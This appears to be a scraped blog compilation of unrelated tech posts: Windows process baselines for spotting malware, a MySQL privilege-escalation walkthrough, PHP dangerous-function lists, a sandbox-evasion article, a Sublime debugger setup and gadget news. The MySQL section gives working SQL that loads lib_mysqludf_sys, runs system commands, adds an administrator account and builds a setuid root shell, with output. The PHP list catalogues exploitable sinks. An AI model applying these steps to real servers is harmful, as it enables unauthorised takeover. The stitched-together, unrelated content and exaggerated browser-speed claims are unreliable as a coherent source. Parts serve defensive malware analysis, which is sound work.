• %SystemRoot%\system32\csrss.exe
• Username: NT AUTHORITY\SYSTEM
• Creates/Deletes processes and threads, Temp files, etc.
• In XP its used to draw text based console windows. Under Windows 7, the conhost process now does that functionality. For example, cmd.exe
• One csrss process per session
• Its name is often used by malware to hide on systems (CSSRS.EXE, CSRSSS.EXE, etc.)
• Runs within session 0

WININIT.EXE – Windows Initialization Process

• Parent to services.exe (SCM), lsass.exe and lsm.exe
• Created by smss.exe, but since smss.exe exits there is no parent to WININIT.
• Base Priority of 13
• Username: NT AUTHORITY\SYSTEM
• %SystemRoot%\system32\wininit.exe
• Performs user-mode initialization tasks
• Creates %windir%\temp
• Runs within session 0

SERVICES.EXE – Service Control Manager

• Child to WININIT.EXE
• Parent to services such at svchost.exe, dllhost.exe, taskhost.exe, spoolsv.exe, etc. Services are defined in SYSTEM\CurrentControlSet\Services
• %SystemRoot%\System32\wininit.exe
• Username: NT AUTHORITY\SYSTEM
• Base Priority of 9
• Loads a database of services into memory
• Runs within session 0
• There should only be one services.exe process running

LSASS.EXE – Local Security Authority

• Child to WININIT.EXE
• Only one lsass.exe process
• %SystemRoot%\System32\lsass.exe
• Responsible for local security policy to include managing users allowed to login, password policies, writing to the security event log, etc.
• Often targeted by malware as a means to dump passwords. Also mimicked by malware to hide on a system (lass.exe, lssass.exe, lsasss.exe, etc.). These “fake” names will not be a children of wininit.exe.
• Base Priority of 9
• Username: NT AUTHORITY\SYSTEM
• Runs within session 0
• It should not have child processes

SVCHOST.EXE – Service Hosting Process

• Multiple instances of svchost.exe can/do exist/run
• %SystemRoot%\System32\svchost.exe
• Username: Should only be one of three options: NT AUTHORITY\SYSTEM, LOCAL SERVICE, or NETWORK SERVICE
• Should always have a parent of services.exe
• Base Priority of 8
• Often mimicked (scvhost, svch0st, etc.) When they are mimicked they will not be running as children to services.exe.
• Command Line: svchost.exe -k
• -k values should exist within the Software\Microsoft\Windows NT\CurrentVersion\Svchost registry key
• Often times when malware uses the actual svchost.exe to load their malicious service they will not include -k command line parameters and be running under a username that does not match on of the three listed in bullet 3.
• They should all be running within session 0

LSM.EXE – Load Session Manager Service

• Manages the state of terminal server sessions on the local machine. Sends the requests to smss.exe to start new sessions.
• Child to wininit.exe
• It should not have child processes
• Receives logon/off, shell start and termination, connect/disconnects from a session, and lock/unlock desktop
• I have not personally seen malware try and impersonate LSM.exe, but there is always a first so keep your eyes open.
• %systemroot%\System32\lsm.exe
• Base Priority of 8
• Username: NT AUTHORITY\SYSTEM
• Runs within session 0

WINLOGON.EXE – Windows Logon Process

• No parent process
• Could have a child process of LogonUI if smartcard, etc. are used to authenticate
• LogonUI will terminate once the user enters their password. Once password is entered the verification is sent over to LSASS and it’s verified via Active Directory or SAM (the registry hive SAM), which stores local users and group information.
• Base Priority of 13
• Runs within session one
• Handles interactive user logons/logoffs when SAS keystroke combination is entered (Ctrl+Alt+Delete)
• Loads Userinit within Software\Microsoft\Windows NT\CurrentVersion\Winlogon
• The userinit value in the registry should be: Userinit.exe, (note the comma). Malware will sometimes add additional values to this key, which will load malware upon successful logons.
• Userinit.exe exits once it runs so you wont see this process running when you look.
• Userinit initializes the user environment. This includes running GPOs and logon scripts.
• Will run Shell value located at Software\Microsoft\Windows NT\CurrentVersion\Winlogon within the registry. The value of shell should be Explorer.exe. Malware will also use this sometimes to execute malware by adding values.
• Since Userinit exists this is also why Explorer.exe doesn’t have a parent process.

Explorer.exe – AKA Windows Explorer

• No parent process since Userinit.exe exits
• The value “Explorer.exe” is stored in shell value within the registry. The registry location is here: Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
• Base Priority of 8
• Username: The logged on user account.
• %Systemroot%\Explorer.exe
• This will contain multiple child processes.
• Some of you might know this better as, “Windows Explorer”
• This process is often targeted by malware. Malware will often times inject this process. One indication of this is if Explorer.exe is connecting out to the internet. There are other indicators, but that’s another post. We are keeping it simple here.

Let’s sum this post up by creating a simple checklist to review while looking for malicious/suspect process activity.

• Check the parent/child relationships of processes.
• Check which users names the processes are running under
• Check their command line parameters for those processes that use them.
• Check their digital signatures
• Check their base priorities
• Check the location they are being from
• Check their spellings
• Leverage memory analysis to detect hidden and/or injected process. Some malware can hide processes by unlinking them (among other ways). Memory analysis is a must these days.
• When you get comfortable with everything here, dig deeper and check what modules are typically loaded for each process.
• Check and see if processes that should not be connecting out to the internet are not
• Check process privileges
• If wscript.exe process is running check the command line of what it is running.
• Investigate processes running inside %temp%, root of %appdata%, %localappdata%, recycle bin, etc.
• If rundll32.exe is running check its command line as well.
• “Most” legitimate user applications like Adobe, Web browsers, etc. don’t spawn child processes like cmd.exe. If you see this, they should be investigated.
• Core Windows processes shouldn’t be communicating out to the internet. If you see communication from these processes, dig deeper. Look for suspicious URLs/IPs, check process strings, etc.

MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux

Once a MySQL database server has been compromised at root level, it’s often possible to escalate this access to full system level access using User Defined Functions (UDFs). We may have MySQL root access but not system root access for a number of reasons including having a shell account on the target whilst MySQL’s root user has been left unpassworded by default, or alternatively gaining access via SQL injection through a web application connecting to the database as root, which is something I see far too often.
Firstly, you’ll want to check out a copy of sqlmap. For this attack you’ll want to browse to the ‘udf’ directory and select the appropriate library depending on your target platform:

1. udf/mysql/linux/32/lib_mysqludf_sys.so
2. udf/mysql/linux/64/lib_mysqludf_sys.so
3. udf/mysql/windows/32/lib_mysqludf_sys.dll
4. udf/mysql/windows/64/lib_mysqludf_sys.dll

The steps for escalation on both Windows and Linux are the same. Firstly, we need to get a copy of the correct library on to the target machine in a known location – this could be by uploading to a user account we have access to, or uploading via a website image/file upload, or anonymous FTP account. The second step is issuing a SQL query to load this file in to a newly created table row.
Third, we then want to dump that table row out to a new file in either the ‘/usr/lib’ directory or the ‘c:\windows\system32′ directory depending on whether we are on Linux or Windows respectively. The reason we need to do this, is that our regular web application or user account does not have permission to create files in these directories, however the MySQL root user does. Next, we want to instruct MySQL to create a new function to point to the code in our malicious library. Lastly, we execute this new function with arbitrary system commands that we wish to run.

MySQL on Windows Escalation
On windows, the process is as follows:

USE mysql;

CREATE TABLE npn(line blob);

INSERT INTO npn values(load_files('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));

SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';

CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';

SELECT sys_exec("net user npn npn12345678 /add");

SELECT sys_exec("net localgroup Administrators npn /add");



MySQL on Linux Escalation
On Linux, the process is really much the same, assuming we’re logged in as user ‘npn':

* mysql> use mysql;

* mysql> create table npn(line blob);

* mysql> insert into npn values(load_file('/home/npn/lib_mysqludf_sys.so'));

* mysql> select * from npn into dumpfile '/usr/lib/lib_mysqludf_sys.so';

* mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

* mysql> select do_exec('id > /tmp/out; chown npn.npn /tmp/out');

Now from our shell, we can cat /tmp/out:

* npn@pwn:~$ cat /tmp/out

* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)

We can confirm that the commands we ran were executed as root. The easiest thing to do now is for user ‘npn’ to create and compile a simple setuid/system program under C:

#include

#include

#include

int main(void)

{

    setuid(0); setgid(0); system(“/bin/bash”);

}

We can compile this and place it in /tmp/ with:

gcc -o /tmp/shell /home/npn/shell.c

Finally, we can use our MySQL root account to set the setuid bit on the binary:

* mysql> select do_exec('chmod +s /tmp/shell');

User ‘npn’ can then execute /tmp/shell to gain a root shell

npn@pwn:~$ /tmp/shell

root@pwn:/home/npn# cd ~/

root@pwn:~# id

uid=0(root) gid=0(root) groups=0(root)

root@pwn:~# ps

  PID TTY          TIME CMD

 1919 pts/1    00:00:00 bash

 2058 pts/1    00:00:00 ps

root@pwn:~#

Setup PHP Debugger with Sublime in Kali(Debian)

1. Install Sublime
# wget "http://c758482.r82.cf2.rackcdn.com/sublime-text_build-3065_amd64.deb"
# dpkg -i sublime-text_build-3065_amd64.deb

2. Run sublime
# cd /opt/sublime_text
# ./sublime_text

3. Install package control plugin. Open View -> Show Console
If you use Sublime2
"import urllib2,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); os.makedirs( ipp ) if not os.path.exists(ipp) else None; urllib2.install_opener( urllib2.build_opener( urllib2.ProxyHandler()) ); by = urllib2.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); open( os.path.join( ipp, pf), 'wb' ).write(by) if dh == h else None; print('Error validating download (got %s instead of %s), please try manual install' % (dh, h) if dh != h else 'Please restart Sublime Text to finish installation')"

If you use Sublime3(in this post, we use this version)
Place this code and enter
"import urllib.request,os,hashlib; h = '7183a2d3e96f11eeadd761d777e62404' + 'e330c659d4bb41d3bdf022e94cab3cd0'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); by = urllib.request.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); print('Error validating download (got %s instead of %s), please try manual install' % (dh, h)) if dh != h else open(os.path.join( ipp, pf), 'wb' ).write(by) "

4. Restart Sublime

5. Go to Preference -> Package Control to Install Package(Plugin)

6. Type xdebug and install it

7. Install LAMP(Linux + Apache2 + MySQL + PHP) and requirement software
#  apt-get install apache2 php5 php5-gd mysql-server php5-mysql php5-dev php-pear make python

8. Install Xdebug module for PHP5
# apt-get install php5-xdebug

Configure xdebug module in /etc/php5/conf.d/20-xdebug.ini, and fill with this options
zend_extension=/usr/lib/php5/20100525/xdebug.so
xdebug.remote_enable=on
xdebug.remote_handler=dbgp
xdebug.remote_host=localhost
xdebug.remote_port=9000 

9. Restart Apache2
# /etc/init.d/apache2 restart

9. Create example loop php file in sublime
    $arr = array(1, 2, 3, 4);

    foreach ($arr as &$value)
    {
            $value = $value * 2;
            print $value;
    }
?>
 
10. In Sublime, create some  break point with right click and Xdebug -> Add/Remove Break Point.

11. In Sublime menu, Go to "Tools -> Xdebug -> Start Debugging"
(You can see the config of Sublime from "Tools -> Xdebug -> Settings Default(Or Settings User)")

12. Open Firefox

13. Install "The easiest Xdebug 2.0" addon

14. Restart Firefox

15.  Go to "Tools -> Addon", Open Preference of The easiest Xdebug 2.0

16. Input "sublime.xdebug" into IDE key for remote debugging.

17. Visit the page that we want to debug(same page of step#9). Click the bug in the right side

18. Try to refresh it in web browser, the debug was begin and in sublime will control the output page.

List of PHP Exploitation Code

Command Execution

exec           - Returns last line of commands outputpassthru       - Passes commands output directly to the browsersystem         - Passes commands output directly to the browser and returns last lineshell_exec     - Returns commands output`` (backticks) - Same as shell_exec()popen          - Opens read or write pipe to process of a commandproc_open      - Similar to popen() but greater degree of controlpcntl_exec     - Executes a program

PHP Code Execution

Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Includevulnerabilities.

eval()assert()  - identical to eval()preg_replace('/.*/e',...) - /e does an eval() on the matchcreate_function()include()include_once()require()require_once()$_GET['func_name']($_GET['argument']);$func = new ReflectionFunction($_GET['func_name']); $func->invoke(); or $func->invokeArgs(array());

List of functions which accept callbacks

These functions accept a string parameter which could be used to call a function of the attacker's choice. Depending on the function the attacker may or may not have the ability to pass a parameter. In that case an Information Disclosure function like phpinfo() could be used.

Function                     => Position of callback arguments'ob_start'                   =>  0,'array_diff_uassoc'          => -1,'array_diff_ukey'            => -1,'array_filter'               =>  1,'array_intersect_uassoc'     => -1,'array_intersect_ukey'       => -1,'array_map'                  =>  0,'array_reduce'               =>  1,'array_udiff_assoc'          => -1,'array_udiff_uassoc'         => array(-1, -2),'array_udiff'                => -1,'array_uintersect_assoc'     => -1,'array_uintersect_uassoc'    => array(-1, -2),'array_uintersect'           => -1,'array_walk_recursive'       =>  1,'array_walk'                 =>  1,'assert_options'             =>  1,'uasort'                     =>  1,'uksort'                     =>  1,'usort'                      =>  1,'preg_replace_callback'      =>  1,'spl_autoload_register'      =>  0,'iterator_apply'             =>  1,'call_user_func'             =>  0,'call_user_func_array'       =>  0,'register_shutdown_function' =>  0,'register_tick_function'     =>  0,'set_error_handler'          =>  0,'set_exception_handler'      =>  0,'session_set_save_handler'   => array(0, 1, 2, 3, 4, 5),'sqlite_create_aggregate'    => array(2, 3),'sqlite_create_function'     =>  2,

Information Disclosure

Most of these function calls are not sinks. But rather it maybe a vulnerability if any of the data returned is viewable to an attacker. If an attacker can see phpinfo() it is definitely a vulnerability.

phpinfoposix_mkfifoposix_getloginposix_ttynamegetenvget_current_userproc_get_statusget_cfg_vardisk_free_spacedisk_total_spacediskfreespacegetcwdgetlastmogetmygidgetmyinodegetmypidgetmyuid

Other

extract - Opens the door for register_globals attacks (see study in scarlet).parse_str -  works like extract if only one argument is given.  putenvini_setmail - has CRLF injection in the 3rd parameter, opens the door for spam. header - on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header("location: ..."); and they do not die();. The script keeps executing after a call to header(), and will still print output normally. This is nasty if you are trying to protect an administrative area. proc_niceproc_terminateproc_closepfsockopenfsockopenapache_child_terminateposix_killposix_mkfifoposix_setpgidposix_setsidposix_setuid

Filesystem Functions

According to RATS all filesystem functions in php are nasty. Some of these don't seem very useful to the attacker. Others are more useful than you might think. For instance ifallow_url_fopen=On then a url can be used as a file path, so a call to copy($_GET['s'], $_GET['d']); can be used to upload a PHP script anywhere on the system. Also if a site is vulnerable to a request send via GET everyone of those file system functions can be abused to channel and attack to another host through your server.

// open filesystem handlerfopentmpfilebzopengzopenSplFileObject->__construct// write to filesystem (partially in combination with reading)chgrpchmodchowncopyfile_put_contentslchgrplchownlinkmkdirmove_uploaded_filerenamermdirsymlinktempnamtouchunlinkimagepng   - 2nd parameter is a path.imagewbmp  - 2nd parameter is a path. image2wbmp - 2nd parameter is a path. imagejpeg  - 2nd parameter is a path.imagexbm   - 2nd parameter is a path.imagegif   - 2nd parameter is a path.imagegd    - 2nd parameter is a path.imagegd2   - 2nd parameter is a path.iptcembedftp_getftp_nb_get

Bypass Dynamic Analysis

Dynamic malware analysis - or sandboxing - has become a central piece of every major security solution... and so has the presence of evasive code in malicious software. Practically all variants of current threats include some sort of sandbox-detection logic.
One very simple form of evasive code is to delay execution of any suspicious functionality for a certain amount of time - the basic idea is to leverage the fact that dynamic analysis systems monitor execution for a limited amount of time, and in the absence of malicious behavior classify a program as benign. On a victim machine, on the other hand, delaying behavior for a few minutes does not have a real impact, allowing the attacker to easily achieve different behavior in the analysis environment and on a real target machine.
The easiest, and definitely most prevalent method of stalling behavior is to make a program “sleep” for a certain amount of time. Since this is such a common behavior, most analysis sandboxes are able to detect this kind of evasion, and in most cases, simply “skip” the sleep. While this sounds like a simple solution, it can have a wide range of unintended effects as we will see in this blog post.

The Power of Procrastination

In our whitepaper Automated Detection and Mitigation of Execution-Stalling Malicious Code we describe the basic principle behind stalling code used against sandboxes:

Stalling code is typically executed before any malicious behavior. The attacker’s aim is to delay the execution of the malicious activity long enough so that an automated dynamic analysis system fails to extract the interesting malicious behavior.

Code stalling can be achieved in a number of ways: Waiting for a specific action of the user, wasting CPU cycles computing useless data, or simply delaying execution using a call to the Sleep() function.
According to MSDN

VOID WINAPI Sleep(  _In_  DWORD dwMilliseconds);
Suspends the execution of the current thread until the time-out interval elapses.

a call to Sleep() will delay the execution of the current thread by the time passed as argument. Most sandboxes monitor the system- or API-calls of a program under analysis and will therefore see this evasion attempt. Therefore, the sandbox is able to detect, and in most cases even react to this, either by patching the delay argument passed to the operating system, by replacing the called function with a custom implementation, or simply by returning immediately to the calling code (skipping the sleep altogether).

Detecting Sleep Patching

Recently, we have come across an interesting malware family that uses this anti-evasion trick used by sandboxes to detect the presence of the analysis environment (one could call it an anti-evasion-evasion trick…)
This malware detects sleep-patching using the rdtsc instruction in combination with Sleep() to check acceleration of execution, as one can see in the following code extract:

In summary, this code:

• executes rdtsc, which reads the CPU’s timestamp counter, and stores the timestamp in a temporary value,
• invokes Sleep() to delay execution,
• re-executes rdtsc, and
• compares the two timestamps.

Sleep Patching Using High-Resolution Dynamic Analysis

Different from traditional sandboxes, Lastline’s high-resolution analysis engine monitors more than just the interaction of programs with the operating system (or API functions). Our engine sees - and can thus influence - every instruction that is executed by the malicious program, not just API function invocations. Thus, since we can also manipulate the values returned by the rdtsc instruction, we can maintain a consistent execution state even when patching a sleep, for example by fast-forwarding the timestamps returned by the CPU to the program each time a sleep is skipped or accelerated.
As a result, the program can no-longer distinguish if a sleep was truly executed in full, or if the analysis system simply forwarded the time inside the sandbox.

Side-Effects of Sleep Patching: User Emulation

We found other interesting side-effects introduced by sleep patching that might not be directly related to deliberate sandbox detection, as can be seen in the following piece of code:

Here, the malware sample checks for user-activity by repeatedly checking the cursor position (in 30 second intervals).
Most sandboxes have some mechanism to trigger (or simulate) user activity. Typically this means repeatedly changing cursor position, opening new windows, click on dialog-boxes, etc, just to name a few.
In the code above, the malware sample uses the Sleep() method not for delaying malicious activity, but merely to have a simple way for checking that some user-activity --mouse movement, in this case-- was observed within a certain time period. Clearly, if a sandbox naively accelerates this code by patching the sleeps, the behavior that was expected to happen while the malware sample is dormant will not happen, and as a consequence, the presence of the analysis environment will be detected, evading analysis.
Therefore, again, a naive approach to execution-stalling will allow an attacker identify the presence of the sandbox, or, as in this case, the absence of a real user, evading analysis.

Side-Effects of Sleep Patching: Race Conditions

Another interesting problem related to sleep-patching are race conditions: Race conditions are a non-trivial programming error, where multi-threaded code needs to be executed in a specific order to work correctly.
One (ugly, as many programmers would agree) way of avoiding race conditions is to delay code depending on completion of another task by the amount of time this task typically needs.
In the presence of sleep-patching, however, this approach is bound to fail, as the sandbox influences the amount of time that is slept. One such example can be seen in the code below, extracted from another malware family:

In this code, the malware decrypts and executes code from a dropped file, cleaning up after the program has executed (by deleting the file). Between invoking and deleting the program, the malware sample uses a - one already guessed - sleep to make sure the program is started before it is deleted. Once again, by patching the sleep incorrectly, the sandbox breaks this logic, causing the malware to delete the payload before it is ever executed.
A more complex example can be seen below:

Here, malware reads encrypted code from a file on disc and executes it in the context of the current process using a separate thread. Once the payload has been started, the main thread goes into an infinite sleep (but this could equally be a long sleep), before executing ExitProcess (which terminates the execution of all threads in the process).
If this sleep is patched to be shorter than the execution of the malicious payload, the process is terminated before completing its activity, unintentionally stopping the process before it can completely reveal its malicious behavior.

Summary

Timing attacks are common to most malware families today. While some of these timing attacks are easy to detect, naive approaches to overcoming these evasion attempts often cause more harm than they do good, opening gates to evasion attacks based on anti-evasion systems.
Using high-resolution dynamic analysis and leveraging its insight into each instruction that is executed by the malicious program, the Lastline sandbox is able to foil these attacks and reveal the malicious behavior.

Make Mozilla Firefox x30 Times Faster

How to make Mozilla Firefox 30 times faster

1. Type “about:config” into the address bar and hit return. Scroll
down and look for the following entries:

• network.http.pipelining
• network.http.proxy.pipelining
• network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time.
When you enable pipelining it will make several at once, which really
speeds up page loading.

2. Alter the entries as follows:

• Set “network.http.pipelining” to “true”
• Set “network.http.proxy.pipelining” to “true”
• Set “network.http.pipelining.maxrequests” to some number like 30. This
• means it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer.

• Name it “nglayout.initialpaint.delay” and set its value to “0”.
• This value is the amount of time the browser waits before it acts on information it receives.
• If you’re using a broadband connection you’ll load pages 2-30 times faster now.

World's_fastest_charging_battery

While our electronic gadgets are evolving by the day, a common bottleneck faced is the outdated battery technology. Luckily, quite a few technological researches looks promising for the future battery technology - be it the COTA Wireless charging, the superfast NanoDot Smartphone Charger (Recharges in 30 seconds) or the all new ultra-fast charging batteries that last 20 years from Scientists at Nanyang Technology University (NTU).
The new lithium ion batteries can reach a 70% charge in two minutes and last for over 20 years. The change that did the trick was using titanium dioxide nanotubes for the anode (the negative pole) instead of conventional graphite which speeds up the battery's chemical reactions while offering 10,000 charging cycles instead of the usual 500. Since the mini titanium tubes are both easy to make and relatively inexpensive, the technology should not be far away from consumer usage.

This technology would have a wide-ranging impact on all industries, users would not need to replace batteries because it can't hold charge. This is especially useful for electric vehicles, where consumers are put off by the long recharge times and its limited battery life adding up to massive ownership costs of such Eco-frindly electric-automobile technology.

New Google Nexus Family With Android 5.0 Lollipop Announced

Google has officially unveiled the Android 5.0 Lollipop with a new range of Nexus family devices. The newly announced devices are a 6-inch smartphone named Nexus 6, a media streamer called the Nexus Player, and a 8.9-inch tablet built by HTC Nexus 9 - all powered by the next Google Android OS, the Android 5.0 Lollipop.

First, with Motorola, we developed the Nexus 6. This new phone has a contoured aluminum frame, a 6-inch Quad HD display and a 13 megapixel camera. The large screen is complemented by dual front-facing stereo speakers that deliver high-fidelity sound, making it as great for movies and gaming as it is for doing work. It also comes with a Turbo Charger, so you can get up to six hours of use with only 15 minutes of charge.